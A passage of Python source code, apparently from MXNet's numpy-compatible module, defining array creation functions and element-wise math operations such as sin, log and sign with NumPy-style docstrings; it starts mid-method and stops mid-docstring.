return _mx_nd_np.full(self.shape, value, ctx=self.context, dtype=self.dtype, out=self)
# pylint: disable=redefined-outer-name
def _scatter_set_nd(self, value_nd, indices):
"""
This is added as an ndarray class method in order to support polymorphism in NDArray and numpy.ndarray indexing
"""
return _npi.scatter_set_nd(
lhs=self, rhs=value_nd, indices=indices, shape=self.shape, out=self
)
# pylint: enable=redefined-outer-name
@property
def shape(self):
return super(ndarray, self).shape
@property
def ndim(self):
"""Number of array dimensions."""
return len(self.shape)
@property
def size(self):
"""Number of elements in the array."""
return super(ndarray, self).size
def tostype(self, stype):
raise AttributeError('mxnet.numpy.ndarray object has no attribute tostype')
@set_module('mxnet.numpy')
def empty(shape, dtype=_np.float32, order='C', ctx=None):
"""Return a new array of given shape and type, without initializing entries.
Parameters
----------
    shape : int or tuple of int
        Shape of the empty array, e.g., ``(2, 3)`` or ``2``.
dtype : data-type, optional
Desired output data-type for the array, e.g, `numpy.int8`. Default is
`numpy.float32`. Note that this behavior is different from NumPy's `empty`
function where `float64` is the default value, because `float32` is
considered as the default data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : device context, optional
Device context on which the memory is allocated. Default is
`mxnet.context.current_context()`.
Returns
-------
out : ndarray
Array of uninitialized (arbitrary) data of the given shape, dtype, and order.
"""
if order != 'C':
raise NotImplementedError('`empty` only supports order equal to `C`, while received {}'
.format(str(order)))
if ctx is None:
ctx = current_context()
if dtype is None:
dtype = _np.float32
if isinstance(shape, int):
shape = (shape,)
return ndarray(handle=_new_alloc_handle(shape, ctx, False, dtype))
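# Illustrative sketch (added commentary, not part of the original source): `empty`
# allocates without initializing, so the contents are arbitrary until written.
#   >>> x = empty((2, 3))             # float32 array on the current context
#   >>> x[:] = 0                      # values are undefined until assigned
#   >>> y = empty(4, dtype='int32')   # an int shape is promoted to (4,)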
@set_module('mxnet.numpy')
def array(object, dtype=None, ctx=None):
"""
Create an array.
Parameters
----------
object : array_like or `numpy.ndarray` or `mxnet.numpy.ndarray`
An array, any object exposing the array interface, an object whose
__array__ method returns an array, or any (nested) sequence.
dtype : data-type, optional
The desired data-type for the array. Default is `float32`.
ctx : device context, optional
Device context on which the memory is allocated. Default is
`mxnet.context.current_context()`.
Returns
-------
out : ndarray
An array object satisfying the specified requirements.
"""
if ctx is None:
ctx = current_context()
if isinstance(object, ndarray):
dtype = object.dtype if dtype is None else dtype
else:
dtype = _np.float32 if dtype is None else dtype
if not isinstance(object, (ndarray, _np.ndarray)):
try:
object = _np.array(object, dtype=dtype)
except Exception as e:
raise TypeError('{}'.format(str(e)))
ret = empty(object.shape, dtype=dtype, ctx=ctx)
if len(object.shape) == 0:
ret[()] = object
else:
ret[:] = object
return ret
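# Illustrative sketch (added commentary, not part of the original source): unless a
# dtype is given, inputs other than mxnet.numpy.ndarray default to float32.
#   >>> array([[1, 2], [3, 4]]).dtype           # list input -> float32
#   >>> array([1, 2, 3], dtype='int32').dtype   # explicit dtype is respected
#   >>> a = ones((2, 2)); array(a).dtype        # ndarray input keeps a.dtype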
@set_module('mxnet.numpy')
def zeros(shape, dtype=_np.float32, order='C', ctx=None):
"""Return a new array of given shape and type, filled with zeros.
This function currently only supports storing multi-dimensional data
in row-major (C-style).
Parameters
----------
shape : int or tuple of int
The shape of the empty array.
dtype : str or numpy.dtype, optional
An optional value type (default is `numpy.float32`). Note that this
behavior is different from NumPy's `ones` function where `float64`
is the default value, because `float32` is considered as the default
data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
Array of zeros with the given shape, dtype, and ctx.
"""
return _mx_nd_np.zeros(shape, dtype, order, ctx)
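# Illustrative sketch (added commentary, not part of the original source):
#   >>> zeros((2, 3))                 # float32 zeros on the current context
#   >>> zeros((2, 3), dtype='int32')  # explicit dtype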
@set_module('mxnet.numpy')
def ones(shape, dtype=_np.float32, order='C', ctx=None):
"""Return a new array of given shape and type, filled with zeros.
This function currently only supports storing multi-dimensional data
in row-major (C-style).
Parameters
----------
shape : int or tuple of int
The shape of the empty array.
dtype : str or numpy.dtype, optional
An optional value type. Default is `numpy.float32`. Note that this
behavior is different from NumPy's `ones` function where `float64`
is the default value, because `float32` is considered as the default
data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
        Array of ones with the given shape, dtype, and ctx.
"""
return _mx_nd_np.ones(shape, dtype, order, ctx)
@set_module('mxnet.numpy')
def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments
"""
Return a new array of given shape and type, filled with `fill_value`.
Parameters
----------
shape : int or sequence of ints
Shape of the new array, e.g., ``(2, 3)`` or ``2``.
fill_value : scalar
Fill value.
dtype : data-type, optional
The desired data-type for the array. The default, `None`, means
`np.array(fill_value).dtype`.
order : {'C'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. Currently only supports C order.
    ctx : Context, optional
        Device context on which to allocate the array, e.g. the i-th GPU
        (default is the current default context).
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Array of `fill_value` with the given shape, dtype, and order.
Notes
-----
This function differs from the original `numpy.full
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.full.html>`_ in
the following way(s):
- Has an additional `ctx` argument to specify the device
- Has an additional `out` argument
- Currently does not support `order` selection
See Also
--------
empty : Return a new uninitialized array.
ones : Return a new array setting values to one.
zeros : Return a new array setting values to zero.
Examples
--------
>>> np.full((2, 2), 10)
array([[10., 10.],
[10., 10.]])
>>> np.full((2, 2), 2, dtype=np.int32, ctx=mx.cpu(0))
array([[2, 2],
[2, 2]], dtype=int32)
"""
return _mx_nd_np.full(shape, fill_value, order=order, ctx=ctx, dtype=dtype, out=out)
@set_module('mxnet.numpy')
def add(x1, x2, out=None):
"""Add arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be added. If x1.shape != x2.shape, they must be broadcastable to
a common shape (which may be the shape of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
add : ndarray or scalar
The sum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
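    Examples
    --------
    A minimal sketch; scalars broadcast against ndarray operands:
    >>> np.add(np.array([1., 2.]), np.array([3., 4.]))
    array([4., 6.])
    >>> np.add(np.array([1., 2.]), 10)
    array([11., 12.])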
"""
return _mx_nd_np.add(x1, x2, out)
@set_module('mxnet.numpy')
def subtract(x1, x2, out=None):
"""Subtract arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be subtracted from each other. If x1.shape != x2.shape,
they must be broadcastable to a common shape (which may be the shape
of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
subtract : ndarray or scalar
The difference of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
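    Examples
    --------
    Illustrative usage:
    >>> np.subtract(np.array([4., 6.]), np.array([1., 2.]))
    array([3., 4.])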
"""
return _mx_nd_np.subtract(x1, x2, out)
@set_module('mxnet.numpy')
def multiply(x1, x2, out=None):
"""Multiply arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be multiplied. If x1.shape != x2.shape, they must be broadcastable to
a common shape (which may be the shape of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
        The product of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
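    Examples
    --------
    A minimal sketch:
    >>> np.multiply(np.array([1., 2.]), np.array([3., 4.]))
    array([3., 8.])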
"""
return _mx_nd_np.multiply(x1, x2, out)
@set_module('mxnet.numpy')
def divide(x1, x2, out=None):
"""Returns a true division of the inputs, element-wise.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
        The quotient ``x1/x2``, element-wise. This is a scalar if both x1 and x2 are scalars.
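    Examples
    --------
    Illustrative usage (true division in the default `float32` dtype):
    >>> np.divide(np.array([1., 2.]), np.array([2., 4.]))
    array([0.5, 0.5])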
"""
return _mx_nd_np.divide(x1, x2, out=out)
@set_module('mxnet.numpy')
def mod(x1, x2, out=None):
"""Return element-wise remainder of division.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
        The element-wise remainder of ``x1 / x2``. This is a scalar if both x1 and x2 are scalars.
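    Examples
    --------
    A minimal sketch:
    >>> np.mod(np.array([5., 7.]), np.array([2., 4.]))
    array([1., 3.])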
"""
return _mx_nd_np.mod(x1, x2, out=out)
@set_module('mxnet.numpy')
def remainder(x1, x2, out=None):
"""Return element-wise remainder of division.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
        The element-wise remainder of ``x1 / x2``. This is a scalar if both x1 and x2 are scalars.
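    Examples
    --------
    Illustrative usage (``remainder`` behaves like ``mod``):
    >>> np.remainder(np.array([5., 7.]), np.array([2., 4.]))
    array([1., 3.])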
"""
return _mx_nd_np.remainder(x1, x2, out=out)
@set_module('mxnet.numpy')
def power(x1, x2, out=None):
"""First array elements raised to powers from second array, element-wise.
Parameters
----------
x1 : ndarray or scalar
The bases.
x2 : ndarray or scalar
The exponent.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
The bases in x1 raised to the exponents in x2.
This is a scalar if both x1 and x2 are scalars.
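    Examples
    --------
    A minimal sketch; a scalar exponent broadcasts over the bases:
    >>> np.power(np.array([2., 3.]), np.array([3., 2.]))
    array([8., 9.])
    >>> np.power(np.array([2., 3.]), 2)
    array([4., 9.])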
"""
return _mx_nd_np.power(x1, x2, out=out)
@set_module('mxnet.numpy')
def sin(x, out=None, **kwargs):
r"""Trigonometric sine, element-wise.
Parameters
----------
x : ndarray or scalar
Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The sine of each element of x. This is a scalar if `x` is a scalar.
Notes
    -----
This function only supports input type of float.
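    Examples
    --------
    A minimal illustration:
    >>> np.sin(0.0)
    0.0
    >>> np.sin(np.array([0.]))
    array([0.])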
"""
return _mx_nd_np.sin(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def cos(x, out=None, **kwargs):
r"""Cosine, element-wise.
Parameters
----------
x : ndarray or scalar
Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding cosine values. This is a scalar if x is a scalar.
Notes
    -----
This function only supports input type of float.
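    Examples
    --------
    A minimal illustration:
    >>> np.cos(0.0)
    1.0
    >>> np.cos(np.array([0.]))
    array([1.])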
"""
return _mx_nd_np.cos(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def sinh(x, out=None, **kwargs):
"""Hyperbolic sine, element-wise.
Equivalent to ``1/2 * (np.exp(x) - np.exp(-x))`` or ``-1j * np.sin(1j*x)``.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding hyperbolic sine values. This is a scalar if `x` is a scalar.
Notes
    -----
This function only supports input type of float.
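    Examples
    --------
    A minimal illustration:
    >>> np.sinh(0.0)
    0.0
    >>> np.sinh(np.array([0.]))
    array([0.])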
"""
return _mx_nd_np.sinh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def cosh(x, out=None, **kwargs):
"""Hyperbolic cosine, element-wise.
Equivalent to ``1/2 * (np.exp(x) + np.exp(-x))`` and ``np.cos(1j*x)``.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding hyperbolic cosine values. This is a scalar if `x` is a scalar.
Notes
    -----
This function only supports input type of float.
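    Examples
    --------
    A minimal illustration:
    >>> np.cosh(0.0)
    1.0
    >>> np.cosh(np.array([0.]))
    array([1.])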
"""
return _mx_nd_np.cosh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def tanh(x, out=None, **kwargs):
"""
Compute hyperbolic tangent element-wise.
Equivalent to ``np.sinh(x)/np.cosh(x)``.
Parameters
----------
x : ndarray or scalar.
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
----------
y : ndarray or scalar
The corresponding hyperbolic tangent values.
Notes
-----
If `out` is provided, the function writes the result into it,
and returns a reference to `out`. (See Examples)
- input x does not support complex computation (like imaginary number)
>>> np.tanh(np.pi*1j)
TypeError: type <type 'complex'> not supported
Examples
--------
    >>> np.tanh(np.array([0, np.pi]))
array([0. , 0.9962721])
>>> np.tanh(np.pi)
0.99627207622075
>>> # Example of providing the optional output parameter illustrating
>>> # that what is returned is a reference to said parameter
>>> out1 = np.array(1)
>>> out2 = np.tanh(np.array(0.1), out1)
>>> out2 is out1
True
>>> # Example of ValueError due to provision of shape mis-matched `out`
>>> np.tanh(np.zeros((3,3)),np.zeros((2,2)))
mxnet.base.MXNetError:
[07:17:36] ../src/ndarray/./../operator/tensor/../elemwise_op_common.h:135:
Check failed: assign(&dattr, vec.at(i)): Incompatible attr in node
at 0-th output: expected [3,3], got [2,2]
"""
return _mx_nd_np.tanh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def log10(x, out=None, **kwargs):
"""Return the base 10 logarithm of the input array, element-wise.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The logarithm to the base 10 of `x`, element-wise. NaNs are
returned where x is negative. This is a scalar if `x` is a scalar.
Notes
    -----
This function only supports input type of float.
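    Examples
    --------
    Illustrative usage (printed values may differ in the last place depending on
    the backend math library):
    >>> np.log10(np.array([1., 10., 100.]))
    array([0., 1., 2.])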
"""
return _mx_nd_np.log10(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def sqrt(x, out=None, **kwargs):
"""
Return the non-negative square-root of an array, element-wise.
Parameters
----------
x : ndarray or scalar
The values whose square-roots are required.
out : ndarray, or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
An array of the same shape as `x`, containing the positive
square-root of each element in `x`. This is a scalar if `x` is a scalar.
Notes
    -----
This function only supports input type of float.
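    Examples
    --------
    Illustrative usage:
    >>> np.sqrt(np.array([1., 4., 9.]))
    array([1., 2., 3.])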
"""
return _mx_nd_np.sqrt(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def cbrt(x, out=None, **kwargs):
"""
Return the cube-root of an array, element-wise.
Parameters
----------
x : ndarray
The values whose cube-roots are required.
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that the
inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
y : ndarray
        An array of the same shape as x, containing the cube-root of each element in x.
If out was provided, y is a reference to it. This is a scalar if x is a scalar.
Examples
----------
>>> np.cbrt([1,8,27])
array([ 1., 2., 3.])
"""
return _mx_nd_np.cbrt(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def abs(x, out=None, **kwargs):
r"""abs(x, out=None, **kwargs)
Calculate the absolute value element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
absolute : ndarray
An ndarray containing the absolute value of
each element in `x`. This is a scalar if `x` is a scalar.
Examples
--------
>>> x = np.array([-1.2, 1.2])
>>> np.abs(x)
array([1.2, 1.2])
"""
return _mx_nd_np.abs(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def absolute(x, out=None, **kwargs):
"""
Calculate the absolute value element-wise.
np.abs is a shorthand for this function.
Parameters
----------
x : ndarray
Input array.
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
absolute : ndarray
An ndarray containing the absolute value of each element in x.
Examples
----------
>>> x = np.array([-1.2, 1.2])
>>> np.absolute(x)
array([ 1.2, 1.2])
"""
return _mx_nd_np.absolute(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def exp(x, out=None, **kwargs):
r"""exp(x, out=None, **kwargs)
Calculate the exponential of all elements in the input array.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array, element-wise exponential of `x`.
This is a scalar if `x` is a scalar.
Examples
--------
>>> np.exp(1)
2.718281828459045
>>> x = np.array([-1, 1, -2, 2])
>>> np.exp(x)
array([0.36787945, 2.7182817 , 0.13533528, 7.389056 ])
"""
return _mx_nd_np.exp(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def expm1(x, out=None, **kwargs):
r"""expm1(x, out=None, **kwargs)
Calculate `exp(x) - 1` for all elements in the array.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array, element-wise exponential minus one: `out = exp(x) - 1`.
This is a scalar if `x` is a scalar.
Examples
--------
>>> np.expm1(1)
1.718281828459045
>>> x = np.array([-1, 1, -2, 2])
    >>> np.expm1(x)
array([-0.63212056, 1.71828183, -0.86466472, 6.3890561])
"""
return _mx_nd_np.expm1(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arcsin(x, out=None, **kwargs):
r"""
arcsin(x, out=None)
Inverse sine, element-wise.
Parameters
----------
x : ndarray or scalar
`y`-coordinate on the unit circle.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
angle : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
The inverse sine of each element in `x`, in radians and in the
closed interval ``[-pi/2, pi/2]``.
Examples
--------
>>> np.arcsin(1) # pi/2
1.5707963267948966
>>> np.arcsin(-1) # -pi/2
-1.5707963267948966
>>> np.arcsin(0)
0.0
Notes
-----
`arcsin` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that :math:`sin(z) = x`. The convention is to
return the angle `z` whose real part lies in [-pi/2, pi/2].
For real-valued input data types, *arcsin* always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
The inverse sine is also known as `asin` or sin^{-1}.
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.arcsin
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.arcsin.html>`_ in
the following aspects:
- Only support ndarray or scalar now.
- `where` argument is not supported.
- Complex input is not supported.
References
----------
Abramowitz, M. and Stegun, I. A., *Handbook of Mathematical Functions*,
10th printing, New York: Dover, 1964, pp. 79ff.
http://www.math.sfu.ca/~cbm/aands/
"""
return _mx_nd_np.arcsin(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arccos(x, out=None, **kwargs):
"""
Trigonometric inverse cosine, element-wise.
The inverse of cos so that, if y = cos(x), then x = arccos(y).
Parameters
----------
x : ndarray
x-coordinate on the unit circle. For real arguments, the domain is [-1, 1].
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that
the inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
angle : ndarray
The angle of the ray intersecting the unit circle at the given x-coordinate in radians [0, pi].
This is a scalar if x is a scalar.
See also
----------
cos, arctan, arcsin
Notes
----------
arccos is a multivalued function: for each x there are infinitely many numbers z such that
cos(z) = x. The convention is to return the angle z whose real part lies in [0, pi].
For real-valued input data types, arccos always returns real output.
For each value that cannot be expressed as a real number or infinity, it yields nan and sets
the invalid floating point error flag.
The inverse cos is also known as acos or cos^-1.
Examples
----------
We expect the arccos of 1 to be 0, and of -1 to be pi:
>>> np.arccos([1, -1])
array([ 0. , 3.14159265])
"""
return _mx_nd_np.arccos(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arctan(x, out=None, **kwargs):
r"""arctan(x, out=None, **kwargs)
Trigonometric inverse tangent, element-wise.
The inverse of tan, so that if ``y = tan(x)`` then ``x = arctan(y)``.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
        Out has the same shape as `x`. Its values lie in
``[-pi/2, pi/2]`` (``arctan(+/-inf)`` returns ``+/-pi/2``).
This is a scalar if `x` is a scalar.
Notes
-----
`arctan` is a multi-valued function: for each `x` there are infinitely
many numbers `z` such that tan(`z`) = `x`. The convention is to return
the angle `z` whose real part lies in [-pi/2, pi/2].
For real-valued input data types, `arctan` always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
For complex-valued input, we do not have support for them yet.
The inverse tangent is also known as `atan` or tan^{-1}.
Examples
--------
We expect the arctan of 0 to be 0, and of 1 to be pi/4:
>>> x = np.array([0, 1])
>>> np.arctan(x)
array([0. , 0.7853982])
>>> np.pi/4
0.7853981633974483
"""
return _mx_nd_np.arctan(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def sign(x, out=None):
"""
sign(x, out=None)
Returns an element-wise indication of the sign of a number.
The `sign` function returns ``-1 if x < 0, 0 if x==0, 1 if x > 0``. Only supports real number.
Parameters
----------
x : ndarray or a scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The sign of `x`.
This is a scalar if `x` is a scalar.
Note
-------
- Only supports real number as input elements.
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.array([-5., 4.5])
>>> np.sign(a)
array([-1., 1.])
Scalars as input:
>>> np.sign(4.0)
1.0
>>> np.sign(0)
0
Use ``out`` parameter:
>>> b = np.zeros((2, ))
>>> np.sign(a, out=b)
array([-1., 1.])
>>> b
array([-1., 1.])
"""
return _mx_nd_np.sign(x, out=out)
@set_module('mxnet.numpy')
def log(x, out=None, **kwargs):
"""
log(x, out=None)
Natural logarithm, element-wise.
The natural logarithm `log` is the inverse of the exponential function,
so that `log(exp(x)) = x`. The natural logarithm is logarithm in base
`e`.
Parameters
----------
x : ndarray
Input value. Elements must be of real value.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The natural logarithm of `x`, element-wise.
This is a scalar if `x` is a scalar.
Notes
-----
Currently only supports data of real values and ``inf`` as input. Returns data of real value, ``inf``, ``-inf`` and
``nan`` according to the input.
This function differs from the original `numpy.log
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.log.html>`_ in
the following aspects:
- Does not support complex number for now
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.array([1, np.exp(1), np.exp(2), 0], dtype=np.float64)
>>> np.log(a)
array([ 0., 1., 2., -inf], dtype=float64)
Due to internal calculation mechanism, using default float32 dtype may cause some special behavior:
>>> a = np.array([1, np.exp(1), np.exp(2), 0])
>>> np.log(a)
array([ 0., 0.99999994, 2., -inf])
Scalar calculation:
>>> np.log(1)
0.0
"""
return _mx_nd_np.log(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def rint(x, out=None, **kwargs):
"""
Round elements of the array to the nearest integer.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Notes
-----
This function differs from the original `numpy.rint
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.rint.html>`_ in
the following way(s):
    - only ndarray or scalar is accepted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.rint(a)
array([-2., -2., -0., 0., 1., 2., 2.])
"""
return _mx_nd_np.rint(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def log2(x, out=None, **kwargs):
"""
Base-2 logarithm of x.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The logarithm base two of `x`, element-wise.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original `numpy.log2
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.log2.html>`_ in
the following way(s):
    - only ndarray or scalar is accepted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> x = np.array([0, 1, 2, 2**4])
>>> np.log2(x)
array([-inf, 0., 1., 4.])
"""
return _mx_nd_np.log2(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def log1p(x, out=None, **kwargs):
"""
Return the natural logarithm of one plus the input array, element-wise.
Calculates ``log(1 + x)``.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
Natural logarithm of 1 + x, element-wise. This is a scalar
if x is a scalar.
Notes
-----
For real-valued input, `log1p` is accurate also for `x` so small
that `1 + x == 1` in floating-point accuracy.
Logarithm is a multivalued function: for each `x` there is an infinite
number of `z` such that `exp(z) = 1 + x`. The convention is to return
the `z` whose imaginary part lies in `[-pi, pi]`.
For real-valued input data types, `log1p` always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
    Complex-valued input is not supported.
Examples
--------
>>> np.log1p(1e-99)
1e-99
>>> a = np.array([3, 4, 5])
>>> np.log1p(a)
array([1.3862944, 1.609438 , 1.7917595])
"""
return _mx_nd_np.log1p(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def degrees(x, out=None, **kwargs):
"""
degrees(x, out=None)
Convert angles from radians to degrees.
Parameters
----------
x : ndarray
Input value. Elements must be of real value.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The corresponding degree values; if `out` was supplied this is a
reference to it.
This is a scalar if `x` is a scalar.
Notes
-------
This function differs from the original `numpy.degrees
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in
the following aspects:
- Input type does not support Python native iterables(list, tuple, ...). Only ndarray is supported.
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
Convert a radian array to degrees
>>> rad = np.arange(12.) * np.pi / 6
>>> np.degrees(rad)
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
Use specified ``out`` ndarray:
>>> out = np.zeros((rad.shape))
>>> np.degrees(rad, out)
